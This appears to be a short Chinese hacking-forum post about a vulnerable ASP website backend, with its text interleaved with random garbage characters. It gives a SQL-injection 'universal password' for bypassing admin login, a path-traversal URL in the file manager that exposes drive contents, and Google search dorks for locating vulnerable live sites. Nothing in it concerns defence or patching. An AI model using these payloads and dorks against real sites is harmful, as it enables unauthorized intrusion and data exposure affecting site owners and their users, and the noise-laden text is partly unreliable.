后台万能密码 'or'='or'
: w8 I q8 N$ _4 h
, [. _- X3 _ t, i% d后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!& l5 j$ s% W; h2 `- v& a
admin/uploadfile.asp?currentFolder=/upfiles/../! |" b% N% ]& l1 Q- t3 D/ X
* ]6 y4 J- J0 ]2 _1 |1 ]; \漏洞证明:
' D+ R5 z/ C: v0 T; O
: {$ ~: h2 }1 _/ J: `6 i谷歌:inurl:type.asp?id=1 新闻中心, X* f0 ~" P4 F; y- P% {$ `+ W
或者 :inurl:download_ok.asp?7 ?( X8 r: D J: U1 Z
5 T( w# |1 f+ [5 B: H
|